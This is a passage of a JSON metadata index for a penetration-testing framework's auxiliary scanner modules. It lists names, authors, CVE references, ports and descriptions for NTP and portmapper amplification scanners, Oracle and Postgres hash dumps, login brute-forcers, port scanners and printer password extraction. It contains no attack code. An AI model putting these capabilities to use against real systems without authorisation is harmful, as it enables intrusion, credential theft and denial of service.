"platform": "",
"arch": "",
"rport": 123,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/ntp/ntp_req_nonce_dos.rb",
"is_install_path": true,
"ref_name": "scanner/ntp/ntp_req_nonce_dos",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/ntp/ntp_reslist_dos": {
"name": "NTP Mode 7 GET_RESTRICT DRDoS Scanner",
"full_name": "auxiliary/scanner/ntp/ntp_reslist_dos",
"rank": 300,
"disclosure_date": "2014-08-25",
"type": "auxiliary",
"author": [
"Jon Hart <jon_hart@rapid7.com>"
],
"description": "This module identifies NTP servers which permit \"reslist\" queries and\n obtains the list of restrictions placed on various network interfaces,\n networks or hosts. The reslist feature allows remote\n attackers to cause a distributed, reflected denial of service (aka, \"DRDoS\" or\n traffic amplification) via spoofed requests. The more interfaces, networks\n or hosts with specific restrictions, the greater the amplification.\n requests.",
"references": [
"CVE-2013-5211",
"URL-https://github.com/rapid7/metasploit-framework/pull/3696",
"URL-http://r-7.co/R7-2014-12"
],
"platform": "",
"arch": "",
"rport": 123,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/ntp/ntp_reslist_dos.rb",
"is_install_path": true,
"ref_name": "scanner/ntp/ntp_reslist_dos",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/ntp/ntp_unsettrap_dos": {
"name": "NTP Mode 6 UNSETTRAP DRDoS Scanner",
"full_name": "auxiliary/scanner/ntp/ntp_unsettrap_dos",
"rank": 300,
"disclosure_date": "2014-08-25",
"type": "auxiliary",
"author": [
"Jon Hart <jon_hart@rapid7.com>"
],
"description": "This module identifies NTP servers which permit mode 6 UNSETTRAP requests that\n can be used to conduct DRDoS attacks. In some configurations, NTP servers will\n respond to UNSETTRAP requests with multiple packets, allowing remote attackers\n to cause a distributed, reflected denial of service (aka, \"DRDoS\" or traffic\n amplification) via spoofed requests.",
"references": [
"CVE-2013-5211",
"URL-https://github.com/rapid7/metasploit-framework/pull/3696",
"URL-http://r-7.co/R7-2014-12"
],
"platform": "",
"arch": "",
"rport": 123,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/ntp/ntp_unsettrap_dos.rb",
"is_install_path": true,
"ref_name": "scanner/ntp/ntp_unsettrap_dos",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/openvas/openvas_gsad_login": {
"name": "OpenVAS gsad Web Interface Login Utility",
"full_name": "auxiliary/scanner/openvas/openvas_gsad_login",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Vlatko Kosturjak <kost@linux.hr>"
],
"description": "This module simply attempts to login to an OpenVAS gsad interface\n using a specific user/pass.",
"references": [
],
"platform": "",
"arch": "",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-08-26 21:01:10 +0000",
"path": "/modules/auxiliary/scanner/openvas/openvas_gsad_login.rb",
"is_install_path": true,
"ref_name": "scanner/openvas/openvas_gsad_login",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/openvas/openvas_omp_login": {
"name": "OpenVAS OMP Login Utility",
"full_name": "auxiliary/scanner/openvas/openvas_omp_login",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Vlatko Kosturjak <kost@linux.hr>"
],
"description": "This module attempts to authenticate to an OpenVAS OMP service.",
"references": [
],
"platform": "",
"arch": "",
"rport": 9390,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-09-25 09:10:10 +0000",
"path": "/modules/auxiliary/scanner/openvas/openvas_omp_login.rb",
"is_install_path": true,
"ref_name": "scanner/openvas/openvas_omp_login",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/openvas/openvas_otp_login": {
"name": "OpenVAS OTP Login Utility",
"full_name": "auxiliary/scanner/openvas/openvas_otp_login",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Vlatko Kosturjak <kost@linux.hr>"
],
"description": "This module attempts to authenticate to an OpenVAS OTP service.",
"references": [
],
"platform": "",
"arch": "",
"rport": 9391,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-09-25 09:10:10 +0000",
"path": "/modules/auxiliary/scanner/openvas/openvas_otp_login.rb",
"is_install_path": true,
"ref_name": "scanner/openvas/openvas_otp_login",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/oracle/emc_sid": {
"name": "Oracle Enterprise Manager Control SID Discovery",
"full_name": "auxiliary/scanner/oracle/emc_sid",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module makes a request to the Oracle Enterprise Manager Control Console\n in an attempt to discover the SID.",
"references": [
"URL-http://dsecrg.com/files/pub/pdf/Different_ways_to_guess_Oracle_database_SID_(eng).pdf"
],
"platform": "",
"arch": "",
"rport": 1158,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-08-26 21:01:10 +0000",
"path": "/modules/auxiliary/scanner/oracle/emc_sid.rb",
"is_install_path": true,
"ref_name": "scanner/oracle/emc_sid",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/oracle/isqlplus_login": {
"name": "Oracle iSQL*Plus Login Utility",
"full_name": "auxiliary/scanner/oracle/isqlplus_login",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"CG <cg@carnal0wnage.com>",
"todb <todb@metasploit.com>"
],
"description": "This module attempts to authenticate against an Oracle ISQL*Plus\n administration web site using username and password combinations indicated\n by the USER_FILE, PASS_FILE, and USERPASS_FILE.\n\n This module does not require a valid SID, but if one is defined, it will be used.\n Works against Oracle 9.2, 10.1 & 10.2 iSQL*Plus. This module will attempt to\n fingerprint the version and automatically select the correct POST request.",
"references": [
"URL-http://carnal0wnage.attackresearch.com"
],
"platform": "",
"arch": "",
"rport": 5560,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/oracle/isqlplus_login.rb",
"is_install_path": true,
"ref_name": "scanner/oracle/isqlplus_login",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/oracle/isqlplus_sidbrute": {
"name": "Oracle iSQLPlus SID Check",
"full_name": "auxiliary/scanner/oracle/isqlplus_sidbrute",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"CG <cg@carnal0wnage.com>",
"todb <todb@metasploit.com>"
],
"description": "This module attempts to bruteforce the SID on the Oracle application server iSQL*Plus\n login pages. It does this by testing Oracle error responses returned in the HTTP response.\n Incorrect username/pass with a correct SID will produce an Oracle ORA-01017 error.\n Works against Oracle 9.2, 10.1 & 10.2 iSQL*Plus. This module will attempt to\n fingerprint the version and automatically select the correct POST request.",
"references": [
"URL-http://carnal0wnage.attackresearch.com"
],
"platform": "",
"arch": "",
"rport": 5560,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/oracle/isqlplus_sidbrute.rb",
"is_install_path": true,
"ref_name": "scanner/oracle/isqlplus_sidbrute",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/oracle/oracle_hashdump": {
"name": "Oracle Password Hashdump",
"full_name": "auxiliary/scanner/oracle/oracle_hashdump",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"theLightCosine <theLightCosine@metasploit.com>"
],
"description": "This module dumps the usernames and password hashes\n from Oracle given the proper Credentials and SID.\n These are then stored as creds for later cracking using auxiliary/analyze/jtr_oracle_fast.\n This module supports Oracle DB versions 8i, 9i, 10g, 11g, and 12c.",
"references": [
],
"platform": "",
"arch": "",
"rport": "1521",
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2019-03-28 10:06:56 +0000",
"path": "/modules/auxiliary/scanner/oracle/oracle_hashdump.rb",
"is_install_path": true,
"ref_name": "scanner/oracle/oracle_hashdump",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_scanner/oracle/oracle_login": {
"name": "Oracle RDBMS Login Utility",
"full_name": "auxiliary/scanner/oracle/oracle_login",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Patrik Karlsson <patrik@cqure.net>",
"todb <todb@metasploit.com>"
],
"description": "This module attempts to authenticate against an Oracle RDBMS\n instance using username and password combinations indicated\n by the USER_FILE, PASS_FILE, and USERPASS_FILE options.",
"references": [
"URL-http://www.oracle.com/us/products/database/index.html",
"CVE-1999-0502",
"URL-http://nmap.org/nsedoc/scripts/oracle-brute.html"
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/oracle/oracle_login.rb",
"is_install_path": true,
"ref_name": "scanner/oracle/oracle_login",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/oracle/sid_brute": {
"name": "Oracle TNS Listener SID Bruteforce",
"full_name": "auxiliary/scanner/oracle/sid_brute",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"todb <todb@metasploit.com>"
],
"description": "This module queries the TNS listener for a valid Oracle database\n instance name (also known as a SID).\n Any response other than a \"reject\" will be considered a success.\n If a specific SID is provided, that SID will be attempted. Otherwise,\n SIDs read from the named file will be attempted in sequence instead.",
"references": [
],
"platform": "",
"arch": "",
"rport": 1521,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2019-04-26 08:36:32 +0000",
"path": "/modules/auxiliary/scanner/oracle/sid_brute.rb",
"is_install_path": true,
"ref_name": "scanner/oracle/sid_brute",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/oracle/sid_enum": {
"name": "Oracle TNS Listener SID Enumeration",
"full_name": "auxiliary/scanner/oracle/sid_enum",
"rank": 300,
"disclosure_date": "2009-01-07",
"type": "auxiliary",
"author": [
"CG <cg@carnal0wnage.com>",
"MC <mc@metasploit.com>"
],
"description": "This module simply queries the TNS listener for the Oracle SID.\n With Oracle 9.2.0.8 and above the listener will be protected and\n the SID will have to be bruteforced or guessed.",
"references": [
],
"platform": "",
"arch": "",
"rport": 1521,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2019-03-05 03:38:51 +0000",
"path": "/modules/auxiliary/scanner/oracle/sid_enum.rb",
"is_install_path": true,
"ref_name": "scanner/oracle/sid_enum",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/oracle/spy_sid": {
"name": "Oracle Application Server Spy Servlet SID Enumeration",
"full_name": "auxiliary/scanner/oracle/spy_sid",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module makes a request to the Oracle Application Server\n in an attempt to discover the SID.",
"references": [
"URL-http://dsecrg.com/files/pub/pdf/Different_ways_to_guess_Oracle_database_SID_(eng).pdf"
],
"platform": "",
"arch": "",
"rport": 1158,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/oracle/spy_sid.rb",
"is_install_path": true,
"ref_name": "scanner/oracle/spy_sid",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/oracle/tnslsnr_version": {
"name": "Oracle TNS Listener Service Version Query",
"full_name": "auxiliary/scanner/oracle/tnslsnr_version",
"rank": 300,
"disclosure_date": "2009-01-07",
"type": "auxiliary",
"author": [
"CG <cg@carnal0wnage.com>"
],
"description": "This module simply queries the tnslsnr service for the Oracle build.",
"references": [
],
"platform": "",
"arch": "",
"rport": 1521,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2019-03-05 03:38:51 +0000",
"path": "/modules/auxiliary/scanner/oracle/tnslsnr_version.rb",
"is_install_path": true,
"ref_name": "scanner/oracle/tnslsnr_version",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/oracle/tnspoison_checker": {
"name": "Oracle TNS Listener Checker",
"full_name": "auxiliary/scanner/oracle/tnspoison_checker",
"rank": 300,
"disclosure_date": "2012-04-18",
"type": "auxiliary",
"author": [
"ir0njaw (Nikita Kelesis) <nikita.elkey@gmail.com>"
],
"description": "This module checks the server for vulnerabilities like TNS Poison.\n Module sends a server a packet with command to register new TNS Listener and checks\n for a response indicating an error. If the registration is errored, the target is not\n vulnerable. Otherwise, the target is vulnerable to malicious registrations.",
"references": [
"CVE-2012-1675",
"URL-https://seclists.org/fulldisclosure/2012/Apr/204"
],
"platform": "",
"arch": "",
"rport": 1521,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2019-03-05 03:38:51 +0000",
"path": "/modules/auxiliary/scanner/oracle/tnspoison_checker.rb",
"is_install_path": true,
"ref_name": "scanner/oracle/tnspoison_checker",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/oracle/xdb_sid": {
"name": "Oracle XML DB SID Discovery",
"full_name": "auxiliary/scanner/oracle/xdb_sid",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module simply makes an authenticated request to retrieve\n the sid from the Oracle XML DB httpd server.",
"references": [
"URL-http://dsecrg.com/files/pub/pdf/Different_ways_to_guess_Oracle_database_SID_(eng).pdf"
],
"platform": "",
"arch": "",
"rport": 8080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-08-26 21:01:10 +0000",
"path": "/modules/auxiliary/scanner/oracle/xdb_sid.rb",
"is_install_path": true,
"ref_name": "scanner/oracle/xdb_sid",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/oracle/xdb_sid_brute": {
"name": "Oracle XML DB SID Discovery via Brute Force",
"full_name": "auxiliary/scanner/oracle/xdb_sid_brute",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"nebulus"
],
"description": "This module attempts to retrieve the sid from the Oracle XML DB httpd server,\n utilizing Pete Finnigan's default oracle password list.",
"references": [
"URL-http://dsecrg.com/files/pub/pdf/Different_ways_to_guess_Oracle_database_SID_(eng).pdf",
"URL-http://www.petefinnigan.com/default/oracle_default_passwords.csv"
],
"platform": "",
"arch": "",
"rport": 8080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/oracle/xdb_sid_brute.rb",
"is_install_path": true,
"ref_name": "scanner/oracle/xdb_sid_brute",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/pcanywhere/pcanywhere_login": {
"name": "PcAnywhere Login Scanner",
"full_name": "auxiliary/scanner/pcanywhere/pcanywhere_login",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"theLightCosine <theLightCosine@metasploit.com>"
],
"description": "This module will test pcAnywhere logins on a range of machines and\n report successful logins.",
"references": [
"CVE-1999-0502"
],
"platform": "",
"arch": "",
"rport": 5631,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/pcanywhere/pcanywhere_login.rb",
"is_install_path": true,
"ref_name": "scanner/pcanywhere/pcanywhere_login",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/pcanywhere/pcanywhere_tcp": {
"name": "PcAnywhere TCP Service Discovery",
"full_name": "auxiliary/scanner/pcanywhere/pcanywhere_tcp",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"hdm <x@hdm.io>"
],
"description": "Discover active pcAnywhere services through TCP",
"references": [
],
"platform": "",
"arch": "",
"rport": 5631,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/pcanywhere/pcanywhere_tcp.rb",
"is_install_path": true,
"ref_name": "scanner/pcanywhere/pcanywhere_tcp",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/pcanywhere/pcanywhere_udp": {
"name": "PcAnywhere UDP Service Discovery",
"full_name": "auxiliary/scanner/pcanywhere/pcanywhere_udp",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"hdm <x@hdm.io>"
],
"description": "Discover active pcAnywhere services through UDP",
"references": [
"URL-http://www.unixwiz.net/tools/pcascan.txt"
],
"platform": "",
"arch": "",
"rport": 5632,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/pcanywhere/pcanywhere_udp.rb",
"is_install_path": true,
"ref_name": "scanner/pcanywhere/pcanywhere_udp",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/pop3/pop3_login": {
"name": "POP3 Login Utility",
"full_name": "auxiliary/scanner/pop3/pop3_login",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Heyder Andrade <heyder@alligatorteam.org>"
],
"description": "This module attempts to authenticate to an POP3 service.",
"references": [
"URL-http://www.ietf.org/rfc/rfc1734.txt",
"URL-http://www.ietf.org/rfc/rfc1939.txt"
],
"platform": "",
"arch": "",
"rport": 110,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-10-14 11:05:54 +0000",
"path": "/modules/auxiliary/scanner/pop3/pop3_login.rb",
"is_install_path": true,
"ref_name": "scanner/pop3/pop3_login",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/pop3/pop3_version": {
"name": "POP3 Banner Grabber",
"full_name": "auxiliary/scanner/pop3/pop3_version",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"hdm <x@hdm.io>"
],
"description": "POP3 Banner Grabber",
"references": [
],
"platform": "",
"arch": "",
"rport": 110,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/pop3/pop3_version.rb",
"is_install_path": true,
"ref_name": "scanner/pop3/pop3_version",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/portmap/portmap_amp": {
"name": "Portmapper Amplification Scanner",
"full_name": "auxiliary/scanner/portmap/portmap_amp",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"xistence <xistence@0x90.nl>"
],
"description": "This module can be used to discover Portmapper services which can be used in an\n amplification DDoS attack against a third party.",
"references": [
"CVE-2013-5211",
"URL-https://www.us-cert.gov/ncas/alerts/TA14-017A",
"URL-http://blog.level3.com/security/a-new-ddos-reflection-attack-portmapper-an-early-warning-to-the-industry/"
],
"platform": "",
"arch": "",
"rport": 111,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/portmap/portmap_amp.rb",
"is_install_path": true,
"ref_name": "scanner/portmap/portmap_amp",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/portscan/ack": {
"name": "TCP ACK Firewall Scanner",
"full_name": "auxiliary/scanner/portscan/ack",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"kris katterjohn <katterjohn@gmail.com>"
],
"description": "Map out firewall rulesets with a raw ACK scan. Any\n unfiltered ports found means a stateful firewall is\n not in place for them.",
"references": [
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/portscan/ack.rb",
"is_install_path": true,
"ref_name": "scanner/portscan/ack",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/portscan/ftpbounce": {
"name": "FTP Bounce Port Scanner",
"full_name": "auxiliary/scanner/portscan/ftpbounce",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"kris katterjohn <katterjohn@gmail.com>"
],
"description": "Enumerate TCP services via the FTP bounce PORT/LIST\n method.",
"references": [
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
21,
2121
],
"autofilter_services": [
"ftp"
],
"targets": null,
"mod_time": "2019-03-05 03:38:51 +0000",
"path": "/modules/auxiliary/scanner/portscan/ftpbounce.rb",
"is_install_path": true,
"ref_name": "scanner/portscan/ftpbounce",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/portscan/syn": {
"name": "TCP SYN Port Scanner",
"full_name": "auxiliary/scanner/portscan/syn",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"kris katterjohn <katterjohn@gmail.com>"
],
"description": "Enumerate open TCP services using a raw SYN scan.",
"references": [
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/portscan/syn.rb",
"is_install_path": true,
"ref_name": "scanner/portscan/syn",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/portscan/tcp": {
"name": "TCP Port Scanner",
"full_name": "auxiliary/scanner/portscan/tcp",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"hdm <x@hdm.io>",
"kris katterjohn <katterjohn@gmail.com>"
],
"description": "Enumerate open TCP services by performing a full TCP connect on each port.\n This does not need administrative privileges on the source machine, which\n may be useful if pivoting.",
"references": [
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/portscan/tcp.rb",
"is_install_path": true,
"ref_name": "scanner/portscan/tcp",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/portscan/xmas": {
"name": "TCP \"XMas\" Port Scanner",
"full_name": "auxiliary/scanner/portscan/xmas",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"kris katterjohn <katterjohn@gmail.com>"
],
"description": "Enumerate open|filtered TCP services using a raw\n \"XMas\" scan; this sends probes containing the FIN,\n PSH and URG flags.",
"references": [
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/portscan/xmas.rb",
"is_install_path": true,
"ref_name": "scanner/portscan/xmas",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/postgres/postgres_dbname_flag_injection": {
"name": "PostgreSQL Database Name Command Line Flag Injection",
"full_name": "auxiliary/scanner/postgres/postgres_dbname_flag_injection",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"hdm <x@hdm.io>"
],
"description": "This module can identify PostgreSQL 9.0, 9.1, and 9.2 servers that are\n vulnerable to command-line flag injection through CVE-2013-1899. This\n can lead to denial of service, privilege escalation, or even arbitrary\n code execution.",
"references": [
"CVE-2013-1899",
"URL-http://www.postgresql.org/support/security/faq/2013-04-04/"
],
"platform": "",
"arch": "",
"rport": 5432,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/postgres/postgres_dbname_flag_injection.rb",
"is_install_path": true,
"ref_name": "scanner/postgres/postgres_dbname_flag_injection",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/postgres/postgres_hashdump": {
"name": "Postgres Password Hashdump",
"full_name": "auxiliary/scanner/postgres/postgres_hashdump",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"theLightCosine <theLightCosine@metasploit.com>"
],
"description": "This module extracts the usernames and encrypted password\n hashes from a Postgres server and stores them for later cracking.",
"references": [
],
"platform": "",
"arch": "",
"rport": 5432,
"autofilter_ports": [
5432
],
"autofilter_services": [
"postgres"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/postgres/postgres_hashdump.rb",
"is_install_path": true,
"ref_name": "scanner/postgres/postgres_hashdump",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_scanner/postgres/postgres_login": {
"name": "PostgreSQL Login Utility",
"full_name": "auxiliary/scanner/postgres/postgres_login",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"todb <todb@metasploit.com>"
],
"description": "This module attempts to authenticate against a PostgreSQL\n instance using username and password combinations indicated\n by the USER_FILE, PASS_FILE, and USERPASS_FILE options. Note that\n passwords may be either plaintext or MD5 formatted hashes.",
"references": [
"URL-http://www.postgresql.org",
"CVE-1999-0502",
"URL-https://hashcat.net/forum/archive/index.php?thread-4148.html"
],
"platform": "",
"arch": "",
"rport": 5432,
"autofilter_ports": [
5432
],
"autofilter_services": [
"postgres"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/postgres/postgres_login.rb",
"is_install_path": true,
"ref_name": "scanner/postgres/postgres_login",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/postgres/postgres_schemadump": {
"name": "Postgres Schema Dump",
"full_name": "auxiliary/scanner/postgres/postgres_schemadump",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"theLightCosine <theLightCosine@metasploit.com>"
],
"description": "This module extracts the schema information from a\n Postgres server.",
"references": [
],
"platform": "",
"arch": "",
"rport": 5432,
"autofilter_ports": [
5432
],
"autofilter_services": [
"postgres"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/postgres/postgres_schemadump.rb",
"is_install_path": true,
"ref_name": "scanner/postgres/postgres_schemadump",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_scanner/postgres/postgres_version": {
"name": "PostgreSQL Version Probe",
"full_name": "auxiliary/scanner/postgres/postgres_version",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"todb <todb@metasploit.com>"
],
"description": "Enumerates the version of PostgreSQL servers.",
"references": [
"URL-http://www.postgresql.org"
],
"platform": "",
"arch": "",
"rport": 5432,
"autofilter_ports": [
5432
],
"autofilter_services": [
"postgres"
],
"targets": null,
"mod_time": "2017-08-26 21:01:10 +0000",
"path": "/modules/auxiliary/scanner/postgres/postgres_version.rb",
"is_install_path": true,
"ref_name": "scanner/postgres/postgres_version",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_scanner/printer/canon_iradv_pwd_extract": {
"name": "Canon IR-Adv Password Extractor",
"full_name": "auxiliary/scanner/printer/canon_iradv_pwd_extract",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Deral \"Percentx\" Heiland",
"Pete \"Bokojan\" Arzamendi",
"wvu <wvu@metasploit.com>",
"Dev Mohanty"
],
"description": "This module will extract the passwords from address books on various Canon IR-Adv mfp devices.\n Tested models:\n iR-ADV C2030,\n iR-ADV 4045,\n iR-ADV C5030,\n iR-ADV C5235,\n iR-ADV C5240,\n iR-ADV 6055,\n iR-ADV C7065",
"references": [
],
"platform": "",
"arch": "",
"rport": 8000,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2019-02-22 17:01:49 +0000",
"path": "/modules/auxiliary/scanner/printer/canon_iradv_pwd_extract.rb",
"is_install_path": true,
"ref_name": "scanner/printer/canon_iradv_pwd_extract",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_scanner/printer/printer_delete_file": {
"name": "Printer File Deletion Scanner",
"full_name": "auxiliary/scanner/printer/printer_delete_file",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"wvu <wvu@metasploit.com>",
"sinn3r <sinn3r@metasploit.com>",
"MC <mc@metasploit.com>",
"Myo Soe",
"Matteo Cantoni <goony@nothink.org>"
],
"description": "This module deletes a file on a set of printers using the\n Printer Job Language (PJL) protocol.",
"references": [
"URL-https://en.wikipedia.org/wiki/Printer_Job_Language"
],
